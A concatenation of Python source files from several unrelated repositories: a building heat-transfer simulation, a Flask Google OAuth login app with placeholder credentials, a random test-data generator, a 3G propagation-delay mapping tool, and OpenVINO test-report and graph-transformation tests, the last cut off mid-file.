#### File: 1020-energy-efficient-building-jt-rm/python code/Ground.py
```python
code/Ground.py
import pandas as pd
import numpy as np
from CtoK import CtoK
class Ground:
#GROUND Simple class to store the ground temperature
# Reads data from cambridge_weather.csv to when initialized. Like the
# other classes, it stores an internal time step (t), and updates
# by dt whenever Ground.update(dt) is called. It has a property T
# which depends on the current time of the Ground object.
def __init__(self):
self.weather_data = pd.read_csv('cambridge_weather.csv')
def T(self,t):
T=np.interp(t,self.weather_data.iloc[:,0],CtoK(self.weather_data.iloc[:,4]))
return T
```
#### File: 1020-energy-efficient-building-jt-rm/python code/Room.py
```python
from Outside import Outside
from CtoK import CtoK
from isWorkHours import isWorkHours
class Room:
#ROOM class for thermodynamic simulation
def __init__(self, ID,T_range,L,W,building):
#defining constants
self.rho_air = 1.23 #kg m^-3
self.cp_air = 1004 #J kg^-1 K^-1
self.cv_air = 717 #J kg^-1 K^-1
self.a = 0.9 #absorptivity of room
self.e = 0.9 #emissivity of room
self.sb = 5.67 * 10**-8 #stefan boltzmann constant
self.ID = ID
self.T_range = T_range
self.L = L
self.W = W
self.building = building
self.heater = building.heater
self.cooler = building.cooler
#how to fit in these as well? do you have to say = undefined?
self.T=None # Current temperature. Lil sktchy defined as 295 = initial temp in ode run
self.H=3 # Height (m)
self.walls = [] # List of structs: [otherside, area, R_eff]
self.floor=None # struct: [ground, area, R]
self.roof=None # struct: [outside, area, R]
@property
def V(self):
# Computes volume of the room
return self.L*self.W*self.H
@property
def SA(self):
# Computes surface area of the room
return sum([self.walls.area]) + self.floor['area'] + self.roof['area']
def dTdt(self,t,T): # Computers overall dTdt for the room
dQdt_cc = self.getCC(t,T) # Gets conductive/convective heat transfer amt
dQdt_LW_rad = self.getLWRadiation(t,T) # gets LW radiative heat transfer amount
dQdt_SW_rad = self.getSWRadiation(t) # gets SW radiative heat transfer amount
dQdt_internal = self.getInternal(t) # gets internal heat generation rate
dQdt_heater = self.getHeating(t,T) #gets the heating amount for this room
dQdt_cooler = self.getCooling(t,T) #gets the cooling amount for this room
dTdt = (24*3600/(self.rho_air*self.cv_air*self.V))*(dQdt_cc + dQdt_LW_rad + dQdt_SW_rad + dQdt_internal + dQdt_heater + dQdt_cooler)
return dTdt
def getCC(self,t,T):
dQdt_cc = 0
roomTemp = T[self.ID]
for wallidx in range(0,len(self.walls)):
wall = self.walls[wallidx]
if isinstance(wall['otherside'],Outside):
outsideT = wall['otherside'].T(t)
dQdt_cc = dQdt_cc + (wall['area'] * (outsideT - roomTemp)/wall['R'])
elif isinstance(wall['otherside'],Room):
otherRoomT = T[wall['otherside'].ID]
dQdt_cc = dQdt_cc + (wall['area'] * (otherRoomT - roomTemp)/wall['R'])
dQdt_cc = dQdt_cc + self.roof['area']*(self.roof['outside'].T(t) - roomTemp)/self.roof['R']
dQdt_cc = dQdt_cc + self.floor['area']*(self.floor['ground'].T(t) - roomTemp)/self.floor['R']
return dQdt_cc
def getInternal(self,t):
if self.ID == 6:
dQdt_internal = 5000
elif self.ID == 2 and isWorkHours(t):
dQdt_internal = 2000
else:
dQdt_internal = 0
return dQdt_internal
def getLWRadiation(self,t,T):
dQdt_LW_rad = 0
roomTemp = T[self.ID]
for wallidx in range(0,len(self.walls)):
wall = self.walls[wallidx]
if isinstance(wall['otherside'],Outside):
outside = wall['otherside']
dQdt_LW_rad = dQdt_LW_rad + wall['area']*self.sb*(-self.e*(roomTemp**4) \
+ self.a*(outside.T_sky(t)**4))
elif isinstance(wall['otherside'],Room):
otherRoom = wall['otherside']
otherRoomT = T[otherRoom.ID]
dQdt_LW_rad = dQdt_LW_rad + wall['area']*self.sb*(-self.e*(roomTemp**4) \
+ self.a*(otherRoomT**4))
dQdt_LW_rad = dQdt_LW_rad +self.roof['area']*self.sb*(-self.e*(roomTemp**4)\
+ self.a*(self.roof['outside'].T_sky(t)**4))
dQdt_LW_rad = dQdt_LW_rad +self.floor['area']*self.sb*(-self.e*(roomTemp**4)\
+ self.a*(self.floor['ground'].T(t)**4))
return dQdt_LW_rad
def getSWRadiation(self,t):
dQdt_SW_rad = self.roof['area']*self.a*self.roof['outside'].S(t)
return dQdt_SW_rad
def addWall(self,otherside,A_wall,R_eff):
newWall = {'otherside': otherside,'area':A_wall,'R':R_eff}
self.walls.append(newWall)
def addFloor(self,ground,A_floor,R_eff):
self.floor = {'ground':ground,'area':A_floor,'R':R_eff}
def addRoof(self,outside,A_roof,R_eff):
self.roof = {'outside':outside,'area':A_roof,'R':R_eff}
def getHeating(self,t,T):
# Gets the heater's output for time t, converts it
# into units of energy/time
roomTemp = T[self.ID]
[TH,fH] = self.heater.getHeating(t,T)
deltaT = TH - roomTemp
roomFlow = fH[self.ID]
dQdt_heater = self.cp_air * self.rho_air * roomFlow * deltaT
return dQdt_heater
def getCooling(self,t,T):
roomTemp = T[self.ID]
[TC,fC] = self.cooler.getCooling(t,T)
deltaT = TC - roomTemp
roomFlow = fC[self.ID]
dQdt_cooler = self.cp_air * self.rho_air * roomFlow * deltaT
return dQdt_cooler
``` |
{
"source": "jocerfranquiz/email_analytics",
"score": 3
} |
#### File: jocerfranquiz/email_analytics/app.py
```python
from flask import Flask, url_for, redirect, session
from authlib.integrations.flask_client import OAuth
app = Flask(__name__)
app.secret_key = 'YOUR_APP_KEY'
# oauth config
oauth = OAuth(app)
google = oauth.register(
name = 'google',
client_id = 'YOUR_API_ID',
client_secret = 'YOUR_API_SECRET',
access_token_url='https://accounts.google.com/o/oauth2/token',
acces_token_params=None,
authorize_url = 'https://accounts.google.com/o/oauth2/auth',
authorize_params = None,
api_base_url = 'https://www.googleapis.com/oauth2/v1/',
client_kwargs={'scope': 'openid profile email'}
)
@app.route('/')
def hello_world():
email = dict(session).get('email', None)
return f'Hello {email}'
@app.route('/login')
def login():
google = oauth.create_client('google')
redirect_uri = url_for('authorize', _external=True)
return google.authorize_redirect(redirect_uri)
@app.route('/authorize')
def authorize():
google = oauth.create_client('google')
token = google.authorize_access_token()
resp = google.get('userinfo',token=token)
user_info = resp.json()
# do something with the token and profile
session['email'] = user_info['email']
return redirect('/')
@app.route('/logout')
def logout():
for key in list(session.keys()):
session.pop(key)
return redirect('/')
``` |
{
"source": "jocerfranquiz/random-generator-file-folders",
"score": 4
} |
#### File: jocerfranquiz/random-generator-file-folders/data_generate.py
```python
import os
import random
import string
import sys
def path_validator(p):
if os.path.isdir(p):
# return the normalized path including safe case sensitivity
return os.path.normpath(os.path.normcase(p))
else:
raise argparse.ArgumentTypeError('Path location incorrect')
def name_size_validator(s):
""" This function validates the folder_name/folder_sizes argument to de format
<name1>,<size1>,<name2>,<size2>..."""
# Warning: this depends on OS's ASCII table definition
LEGAL_CHARS = ('-_.() ' +
string.ascii_uppercase +
string.ascii_lowercase +
string.digits)
l = s.split(',')
# The length of l should be even and names must be different
raw_folder_names = l[::2]
raw_folder_sizes = l[1::2]
if len(set(raw_folder_names)) != len(raw_folder_sizes):
raise argparse.ArgumentTypeError('There is one missing or repeated folder-name/folder-size')
# Taking away illegal chars
folder_names = []
for name in raw_folder_names:
new_name = ''.join(c for c in name if c in LEGAL_CHARS)
if len(new_name) == 0:
raise argparse.ArgumentTypeError("Folder's name contains only illegal characters")
else:
folder_names.append(new_name)
# Validate sizes as integer type
folder_sizes = []
for size in raw_folder_sizes:
try:
folder_sizes.append(int(size))
except Exception as e:
raise argparse.ArgumentTypeError("Folder's SIZE is not an integer")
return dict(zip(folder_names, folder_sizes))
def rand_string():
"""This function generates a random string with random length"""
# Test does not says the max length of the alphanumeric string
# or upper case or lower case.
# I took liberties on both cases: 128 max length, upper and lower cases
length = random.randint(1, 128)
# SystemRandom() is more cryptographically secure because depends on the OS
return (''.join( random.SystemRandom().choice(
string.ascii_uppercase +
string.ascii_lowercase +
string.digits) for _ in range(length)) + '\n')
def file_filler(path, sub_folder, folder_size, file_size):
# Creates file into the sub-folder
num_file = folder_size // file_size
last_file = folder_size % file_size
for n in range(1,num_file + 1):
try:
file_handle = open(os.path.join(path, sub_folder, 'file' + str(n)), 'w')
acum_file = 0
while acum_file < file_size*1048576:
line = rand_string()
line_size = len(line)
try:
file_handle.write(line)
acum_file += line_size
except Exception as e:
sys.stdout.write(str(e)+'\n')
file_handle.close()
except Exception as e:
sys.stdout.write(str(e)+'\n')
if last_file:
try:
file_handle = open(os.path.join(path, sub_folder, 'file' + str(num_file + 1)), 'w')
acum_file = 0
while acum_file < last_file*1048576:
line = rand_string()
line_size = len(line)
try:
file_handle.write(line)
acum_file += line_size
except Exception as e:
sys.stdout.write(str(e)+'\n')
file_handle.close()
except Exception as e:
sys.stdout.write(str(e)+'\n')
return
def folder_creator(path, folder_names):
# Create sub-folders per each folder-name passed to de program
try:
for name in folder_names:
os.mkdir(os.path.join(path,name))
return
except Exception as e:
sys.stdout.write(str(e))
sys.exit('\n')
def main(args):
# Verify folder sizes > 0
if min(args.folders[0].values()) <= 0:
sys.stdout.write('Some sub-folder size is zero or less. Quitting now...')
sys.exit('\n')
# Verify file size > 0
if args.size[0] <= 0:
sys.stdout.write('File size is zero or less. Quitting now...')
sys.exit('\n')
# Verify file size <= folder_size
if args.size[0] > min(args.folders[0].values()):
sys.stdout.write('File size can not be more than the minimun sub-folder size. Quitting now...')
sys.exit('\n')
# verify the disk space available
fs_stats = os.statvfs(args.path[0])
free_space = fs_stats.f_bavail * fs_stats.f_frsize
projected_space = sum( list( args.folders[0].values() ) )*1048576
ratio = (free_space - projected_space)*1.0/free_space if free_space!=0 else -1
if ratio < 0.1 and ratio >= 0.0:
sys.stdout.write('After execution 90% of available disk space will be used. Quitting now...')
sys.exit('\n')
elif ratio < 0:
sys.stdout.write('Not enough space available on disk. Quitting now...')
sys.exit('\n')
# Create sub-folders
folder_creator(args.path[0],list(args.folders[0].keys()))
# Create files
for name in args.folders[0]:
file_filler(args.path[0], name, args.folders[0][name], args.size[0])
return
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description = 'Generate a Master Dataset')
parser.add_argument('path',
metavar='PATH',
type=path_validator,
nargs=1,
default=os.getcwd(),
help='Path to location of Master Dataset. Default is the current working path')
parser.add_argument('size',
metavar='SIZE',
type=int,
default=2,
nargs=1,
help='Max size in MB for files in the Master Dataset')
parser.add_argument('folders',
metavar='SUB-FOLDERS',
type=name_size_validator,
nargs=1,
help='Sub-folders in the Master Dataset in the format <name1>,<size1>,<name2>,<size2>... where <name> represents a folder name and <size> represent a size in megabytes')
main(parser.parse_args())
# TODO Validate max num of subfolders
# TODO Add some messages on excecution time
``` |
{
"source": "joch182/3G-Huawei-Propagation-Delay-Tool-Google-Earth",
"score": 3
} |
#### File: joch182/3G-Huawei-Propagation-Delay-Tool-Google-Earth/calc.py
```python
import math
import numpy as np
R = 6378.1 #Radius of the Earth in Km
''' From 1 coordinate point, a set distance and the angle we get the 2nd coordinate point. The
angleRad variable is usually know as bearing (in RAD unit) '''
def getCoordinatePoint(originLat, originLon, angleRad, distance):
originLat = np.deg2rad(originLat)
originLon = np.deg2rad(originLon)
lat2 = math.asin(math.sin(originLat)*math.cos(distance/R) + math.cos(originLat)*math.sin(distance/R)*math.cos(angleRad))
lon2 = originLon + math.atan2(math.sin(angleRad)*math.sin(distance/R)*math.cos(originLat), math.cos(distance/R)-math.sin(originLat)*math.sin(lat2))
coord = {
'lat2': np.rad2deg(lat2),
'lon2': np.rad2deg(lon2)
}
return coord
def getCoordinateTP0(originLat, originLon, Azimuth, BW, tpProportion):
splitBW = BW/4
tpProportion = round(tpProportion * 1500/100,2) #2200 is an estimated value to shown different levels on the TP in GE
coordString = str(originLon) + ',' + str(originLat) + ',' + str(tpProportion) + ' '
for i in range(5):
distance = 0.16
angle = Azimuth - (BW/2) + (i*splitBW)
if angle >= 360:
angle = angle - 360
if angle < 0:
angle = angle + 360
genCord = getCoordinatePoint(originLat, originLon, np.deg2rad(angle), distance)
coordString = coordString + str(genCord['lon2']) + ',' + str(genCord['lat2']) + ',' + str(tpProportion) + ' '
coordString = coordString + str(originLon) + ',' + str(originLat) + ',' + str(tpProportion)
return coordString
def getCoordinateTPMoreThan0(originLat, originLon, Azimuth, BW, tpProportion, TPLevel):
splitBW = BW/4
tpProportion = round(tpProportion * 1500/100,2) #2200 is an estimated value to shown different levels on the TP in GE
coordString = ''
#coordString = str(originLon) + ',' + str(originLat) + ',' + str(tpProportion) + ' '
lowerDistance = {
1: 0.16,
2: 0.39,
3: 0.62,
4: 0.86,
5: 1.1,
6: 1.3,
10: 2.3,
16: 3.7,
26: 6,
36: 8.3,
55: 12.8
}
''' We get the points for the lower curve '''
distance = lowerDistance.get(TPLevel, 'Invalid lower TP level')
for i in range(5):
angle = Azimuth - (BW/2) + (i*splitBW)
if angle >= 360:
angle = angle - 360
if angle < 0:
angle = angle + 360
genCord = getCoordinatePoint(originLat, originLon, math.radians(angle), distance)
if i == 0:
origin = genCord
coordString = coordString + str(genCord['lon2']) + ',' + str(genCord['lat2']) + ',' + str(tpProportion) + ' '
higherDistance = {
1: 0.39,
2: 0.62,
3: 0.86,
4: 1.1,
5: 1.3,
6: 2.3,
10: 3.7,
16: 6,
26: 8.3,
36: 12.8,
55: 16
}
''' We get the points for the higher curve '''
distance = higherDistance.get(TPLevel, 'Invalid higher TP level')
for i in reversed(range(5)):
angle = Azimuth - (BW/2) + (i*splitBW)
if angle >= 360:
angle = angle - 360
if angle < 0:
angle = angle + 360
genCord = getCoordinatePoint(originLat, originLon, math.radians(angle), distance)
coordString = coordString + str(genCord['lon2']) + ',' + str(genCord['lat2']) + ',' + str(tpProportion) + ' '
coordString = coordString + str(origin['lon2']) + ',' + str(origin['lat2']) + ',' + str(tpProportion)
return coordString
def generateKMLData(df):
df['Bearing'] = df['Beamwidth'].apply(np.deg2rad)
df['TP_Sum'] = df['VS.TP.UE.0'] + df['VS.TP.UE.1'] + df['VS.TP.UE.2'] + df['VS.TP.UE.3'] + df['VS.TP.UE.4'] + df['VS.TP.UE.5'] + df['VS.TP.UE.6.9'] + df['VS.TP.UE.10.15'] + df['VS.TP.UE.16.25'] + df['VS.TP.UE.26.35'] + df['VS.TP.UE.36.55'] + df['VS.TP.UE.More55']
df['Proportion_TP0'] = round(100 * (df['VS.TP.UE.0']/df['TP_Sum']),2)
df['Proportion_TP1'] = round(100 * (df['VS.TP.UE.1']/df['TP_Sum']),2)
df['Proportion_TP2'] = round(100 * (df['VS.TP.UE.2']/df['TP_Sum']),2)
df['Proportion_TP3'] = round(100 * (df['VS.TP.UE.3']/df['TP_Sum']),2)
df['Proportion_TP4'] = round(100 * (df['VS.TP.UE.4']/df['TP_Sum']),2)
df['Proportion_TP5'] = round(100 * (df['VS.TP.UE.5']/df['TP_Sum']),2)
df['Proportion_TP6.9'] = round(100 * (df['VS.TP.UE.6.9']/df['TP_Sum']),2)
df['Proportion_TP10.15'] = round(100 * (df['VS.TP.UE.10.15']/df['TP_Sum']),2)
df['Proportion_TP16.25'] = round(100 * (df['VS.TP.UE.16.25']/df['TP_Sum']),2)
df['Proportion_TP26.35'] = round(100 * (df['VS.TP.UE.26.35']/df['TP_Sum']),2)
df['Proportion_TP36.55'] = round(100 * (df['VS.TP.UE.36.55']/df['TP_Sum']),2)
df['Proportion_TPMore55'] = round(100 * (df['VS.TP.UE.More55']/df['TP_Sum']),2)
df['Avg.RSCP_TP0'] = df['VS.RSCP.Mean.TP0(dBm)'] - 115
df['Avg.RSCP_TP1'] = df['VS.RSCP.Mean.TP1(dBm)'] - 115
df['Avg.RSCP_TP2'] = df['VS.RSCP.Mean.TP2(dBm)'] - 115
df['Avg.RSCP_TP3'] = df['VS.RSCP.Mean.TP3(dBm)'] - 115
df['Avg.RSCP_TP4'] = df['VS.RSCP.Mean.TP4(dBm)'] - 115
df['Avg.RSCP_TP5'] = df['VS.RSCP.Mean.TP5(dBm)'] - 115
df['Avg.RSCP_TP6.9'] = df['VS.RSCP.Mean.TP6.9(dBm)'] - 115
df['Avg.RSCP_TP10.15'] = df['VS.RSCP.Mean.TP10.15(dBm)'] - 115
df['Avg.RSCP_TP16.25'] = df['VS.RSCP.Mean.TP16.25(dBm)'] - 115
df['Avg.RSCP_TP26.35'] = df['VS.RSCP.Mean.TP26.35(dBm)'] - 115
df['Avg.RSCP_TP36.55'] = df['VS.RSCP.Mean.TP36.55(dBm)'] - 115
df['Avg.RSCP_TPMore55'] = df['VS.RSCP.Mean.TP.More55(dBm)'] - 115
df['Avg.ECNO_TP0'] = round((df['VS.EcNo.Mean.TP0(dB)'] - 49)/2,2)
df['Avg.ECNO_TP1'] = round((df['VS.EcNo.Mean.TP1(dB)'] - 49)/2,2)
df['Avg.ECNO_TP2'] = round((df['VS.EcNo.Mean.TP2(dB)'] - 49)/2,2)
df['Avg.ECNO_TP3'] = round((df['VS.EcNo.Mean.TP3(dB)'] - 49)/2,2)
df['Avg.ECNO_TP4'] = round((df['VS.EcNo.Mean.TP4(dB)'] - 49)/2,2)
df['Avg.ECNO_TP5'] = round((df['VS.EcNo.Mean.TP5(dB)'] - 49)/2,2)
df['Avg.ECNO_TP6.9'] = round((df['VS.EcNo.Mean.TP6.9(dB)'] - 49)/2,2)
df['Avg.ECNO_TP10.15'] = round((df['VS.EcNo.Mean.TP10.15(dB)'] - 49)/2,2)
df['Avg.ECNO_TP16.25'] = round((df['VS.EcNo.Mean.TP16.25(dB)'] - 49)/2,2)
df['Avg.ECNO_TP26.35'] = round((df['VS.EcNo.Mean.TP26.35(dB)'] - 49)/2,2)
df['Avg.ECNO_TP36.55'] = round((df['VS.EcNo.Mean.TP36.55(dB)'] - 49)/2,2)
df['Avg.ECNO_TPMore55'] = round((df['VS.EcNo.Mean.TP.More55(dB)'] - 49)/2,2)
df = df.drop(['VS.TP.UE.0','VS.TP.UE.1','VS.TP.UE.2','VS.TP.UE.3','VS.TP.UE.4','VS.TP.UE.5','VS.TP.UE.6.9','VS.TP.UE.10.15','VS.TP.UE.16.25','VS.TP.UE.26.35','VS.TP.UE.36.55','VS.TP.UE.More55','VS.EcNo.Mean.TP0(dB)','VS.EcNo.Mean.TP1(dB)','VS.EcNo.Mean.TP2(dB)','VS.EcNo.Mean.TP3(dB)','VS.EcNo.Mean.TP4(dB)','VS.EcNo.Mean.TP5(dB)','VS.EcNo.Mean.TP6.9(dB)','VS.EcNo.Mean.TP10.15(dB)','VS.EcNo.Mean.TP16.25(dB)','VS.EcNo.Mean.TP26.35(dB)','VS.EcNo.Mean.TP36.55(dB)','VS.EcNo.Mean.TP.More55(dB)','VS.RSCP.Mean.TP0(dBm)','VS.RSCP.Mean.TP1(dBm)','VS.RSCP.Mean.TP2(dBm)','VS.RSCP.Mean.TP3(dBm)','VS.RSCP.Mean.TP4(dBm)','VS.RSCP.Mean.TP5(dBm)','VS.RSCP.Mean.TP6.9(dBm)','VS.RSCP.Mean.TP10.15(dBm)','VS.RSCP.Mean.TP16.25(dBm)','VS.RSCP.Mean.TP26.35(dBm)','VS.RSCP.Mean.TP36.55(dBm)','VS.RSCP.Mean.TP.More55(dBm)','TP_Sum'], axis=1)
df['Coordinates_TP0'] = df.apply(lambda x: getCoordinateTP0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP0']), axis=1)
df['Coordinates_TP1'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP1'], 1), axis=1)
df['Coordinates_TP2'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP2'], 2), axis=1)
df['Coordinates_TP3'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP3'], 3), axis=1)
df['Coordinates_TP4'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP4'], 4), axis=1)
df['Coordinates_TP5'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP5'], 5), axis=1)
df['Coordinates_TP6'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP6.9'], 6), axis=1)
df['Coordinates_TP10'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP10.15'], 10), axis=1)
df['Coordinates_TP16'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP16.25'], 16), axis=1)
df['Coordinates_TP26'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP26.35'], 26), axis=1)
df['Coordinates_TP36'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TP36.55'], 36), axis=1)
df['Coordinates_TP55'] = df.apply(lambda x: getCoordinateTPMoreThan0(x['Lat'],x['Lon'],x['Azimuth'],x['Beamwidth'],x['Proportion_TPMore55'], 55), axis=1)
print(df.head())
return df
``` |
{
"source": "JOCh1958/openvino",
"score": 2
} |
#### File: functional_test_utils/layer_tests_summary/summarize.py
```python
import xml.etree.ElementTree as ET
from jinja2 import Environment, FileSystemLoader
import argparse
import os
from datetime import datetime
parser = argparse.ArgumentParser()
xml_help = """
Paths to xml summary files from layer tests.
In case of entries intersection, results will
be merged basing on timestamp - entry from latest
report is be kept.
"""
out_help = "Path where to save html report"
parser.add_argument("--xml", help=xml_help, nargs="*", required=True)
parser.add_argument("--out", help=out_help, default="")
args = parser.parse_args()
verified_operations = [
'Abs-0',
'Acos-0',
'Add-1',
'Asin-0',
'Assign-6',
'AvgPool-1',
'BatchNormInference-5',
'BinaryConvolution-1',
'Broadcast-1',
'Broadcast-3',
'Bucketize-3',
'CTCGreedyDecoder-0',
'CTCGreedyDecoderSeqLen-6',
'Concat-0',
'ConvertLike-1',
'Convolution-1',
'DetectionOutput-0',
'Divide-1',
'ExperimentalDetectronDetectionOutput-6',
'ExperimentalDetectronGenerateProposalsSingleImage-6',
'ExperimentalDetectronPriorGridGenerator-6',
'ExperimentalDetectronROIFeatureExtractor-6',
'ExperimentalDetectronTopKROIs-6',
'GRUSequence-5',
'Gather-1',
'GatherElements-6',
'GatherND-5',
'Gelu-7',
'GroupConvolution-1',
'GroupConvolutionBackpropData-1',
'GRUSequence-5',
'HSigmoid-5',
'HSwish-4',
'HardSigmoid-0',
'Interpolate-4',
'LRN-0',
'LSTMCell-4',
'LSTMSequence-5',
'LogSoftmax-5',
'Loop-5',
'MVN-6',
'MaxPool-1',
'Mish-4',
'Multiply-1',
'NonMaxSuppression-4',
'NonMaxSuppression-5',
'PSROIPooling-0',
'Proposal-0',
'Proposal-4',
'RNNSequence-4',
'ROIAlign-3',
'ROIPooling-0',
'Range-0',
'Range-4',
'ReadValue-6',
'ReduceL1-4',
'ReduceL2-4',
'ReduceMean-1',
'RegionYOLO-0',
'Relu-0',
'ReorgYOLO-0',
'GRUSequence-5',
'Round-5',
'ScatterNDUpdate-3',
'ShapeOf-0',
'ShapeOf-3',
'Sigmoid-0',
'Sin-0',
'SoftPlus-4',
'Softmax-1',
'Split-1',
'StridedSlice-1',
'Substract-1',
'Swish-4',
'Tile-0',
'TopK-1',
'TopK-3'
]
pass_rate_avg = dict()
general_pass_rate = dict()
general_test_count = dict()
general_passed_tests = dict()
def merge_xmls(xmls: list):
if len(xmls) == 1:
return xmls[0]
summary = ET.Element("report")
summary.set("timestamp", xmls[0].attrib["timestamp"])
results = ET.SubElement(summary, "results")
ops_list = ET.SubElement(summary, "ops_list")
for xml in xmls:
for op in xml.find("ops_list"):
if ops_list.find(op.tag) is None:
ET.SubElement(ops_list, op.tag)
for device in xml.find("results"):
device_results = results.find(device.tag)
if device_results is None:
results.append(device)
else:
for entry in device:
if device_results.find(entry.tag) is not None:
current_timestamp = datetime.strptime(xml.attrib["timestamp"], "%d-%m-%Y %H:%M:%S")
base_timestamp = datetime.strptime(summary.attrib["timestamp"], "%d-%m-%Y %H:%M:%S")
if current_timestamp > base_timestamp:
device_results.find(entry.tag).attrib = entry.attrib
else:
device_results.append(entry)
return summary
xmls = []
for xml in args.xml:
try:
xmls.append(ET.parse(xml).getroot())
except ET.ParseError:
print("Error parsing", xml)
root = merge_xmls(xmls)
timestamp = root.attrib["timestamp"]
ops = []
for op in root.find("ops_list"):
ops.append(op.tag)
ordered_ops = sorted(ops)
results = {}
for device in root.find("results"):
results[device.tag] = {op.tag: op.attrib for op in device}
pass_rate_avg[device.tag] = 0
general_test_count[device.tag] = 0
general_passed_tests[device.tag] = 0
for op in results[device.tag]:
pass_rate = round(float(results[device.tag][op]["passrate"]), 1)
results[device.tag][op]["passrate"] = pass_rate
pass_rate_avg[device.tag] += pass_rate
general_test_count[device.tag] += (int(results[device.tag][op]["passed"]) + int(results[device.tag][op]["failed"]) +
int(results[device.tag][op]["crashed"]) + int(results[device.tag][op]["skipped"]))
general_passed_tests[device.tag] += int(results[device.tag][op]["passed"])
pass_rate_avg[device.tag] /= len(results[device.tag])
pass_rate_avg[device.tag] = round(float(pass_rate_avg[device.tag]), 1)
general_pass_rate[device.tag] = general_passed_tests[device.tag] * 100 / general_test_count[device.tag]
general_pass_rate[device.tag] = round(float(general_pass_rate[device.tag]), 1)
devices = results.keys()
file_loader = FileSystemLoader('template')
env = Environment(loader=file_loader)
template = env.get_template('report_template.html')
res = template.render(ordered_ops=ordered_ops, devices=devices, results=results, timestamp=timestamp,
general_pass_rate=general_pass_rate, pass_rate_avg=pass_rate_avg,
verified_operations=verified_operations)
with open(os.path.join(args.out, "report.html"), "w") as f:
f.write(res)
```
#### File: extensions/back/InterpolateReshape_test.py
```python
import unittest
from argparse import Namespace
import numpy as np
from extensions.back.InterpolateReshape import InterpolateReshapeWA, InterpolateConcat
from mo.utils.ir_engine.compare_graphs import compare_graphs
from mo.utils.unittest.graph import build_graph, result, regular_op_with_shaped_data, valued_const_with_data, connect, \
connect_data
nodes = {
**regular_op_with_shaped_data('placeholder', [1, 3, 30, 40], {'type': 'Parameter', 'op': 'Parameter'}),
**valued_const_with_data('out_shape', np.array([60, 160])),
**regular_op_with_shaped_data('interpolate', [1, 3, 60, 160], {'type': 'Interpolate', 'axes': [2, 3],
'op': 'Interpolate', 'version': 'opset1'}),
**regular_op_with_shaped_data('shape', [4], {'type': 'ShapeOf', 'op': 'ShapeOf'}),
**valued_const_with_data('indices', np.array([2, 3])),
**valued_const_with_data('axis', np.array(0)),
**regular_op_with_shaped_data('gather', [2], {'type': 'Gather', 'op': 'Gather'}),
**valued_const_with_data('multiplier', np.array([2, 4])),
**regular_op_with_shaped_data('mul', [2], {'type': 'Multiply', 'op': 'Mul'}),
**regular_op_with_shaped_data('placeholder_1', [1, 3, 60, 160], {'type': 'Parameter', 'op': 'Parameter'}),
**regular_op_with_shaped_data('concat', [1, 7, 60, 160], {'type': 'Concat', 'axis': 1, 'op': 'Concat'}),
**result(),
}
class TestInterpolateReshapeWA(unittest.TestCase):
def test_interpolate_reshape_graph_comparison(self):
graph = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('out_shape', '1:interpolate'),
*connect('interpolate', 'output'),
], nodes_with_edges_only=True)
InterpolateReshapeWA().find_and_replace_pattern(graph)
graph.clean_up()
graph_ref = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect_data('placeholder', 'shape'),
*connect('shape', '0:gather'),
*connect('indices', '1:gather'),
*connect('axis', '2:gather'),
*connect('gather', '0:mul'),
*connect('multiplier', '1:mul'),
*connect('mul', '1:interpolate'),
*connect('interpolate', 'output'),
], nodes_with_edges_only=True)
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
class TestInterpolateConcat(unittest.TestCase):
def test_interpolate_concat_reshape_graph_comparison(self):
graph = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('out_shape', '1:interpolate'),
*connect('interpolate', '0:concat'),
*connect('placeholder_1', '1:concat'),
*connect('concat', 'output'),
], nodes_with_edges_only=True)
InterpolateConcat().find_and_replace_pattern(graph)
graph.clean_up()
graph_ref = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('placeholder_1', 'shape'),
*connect('shape', '0:gather'),
*connect('indices', '1:gather'),
*connect('axis', '2:gather'),
*connect('gather', '1:interpolate'),
*connect('interpolate', '0:concat'),
*connect_data('placeholder_1', '1:concat'),
*connect('concat', 'output'),
], nodes_with_edges_only=True)
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
```
#### File: extensions/back/MatMulNormalizer_test.py
```python
import unittest
from argparse import Namespace
from generator import generate, generator
from extensions.back.MatMulNormalizer import SmartReshape_HC_Reshape_MatMul
from extensions.ops.MatMul import MatMul
from mo.front.common.partial_infer.utils import int64_array
from mo.ops.reshape import Reshape
from mo.utils.ir_engine.compare_graphs import compare_graphs
from mo.utils.unittest.graph import build_graph, regular_op_with_shaped_data, valued_const_with_data, \
result, connect
from mo.utils.unittest.graph import regular_op_with_empty_data as op_with_empty_data
@generator
class SmartReshape_HC_Reshape_MatMulTest(unittest.TestCase):
@generate(
*[
([1, 20, 30], [30, 40], [20, -1], False, False, [-1, 30]),
([1, 20, 30], [40, 30], [20, -1], False, True, [-1, 30]),
([1, 30, 20], [30, 40], [-1, 20], True, False, [30, -1]),
([1, 30, 20], [40, 30], [-1, 20], True, True, [30, -1]),
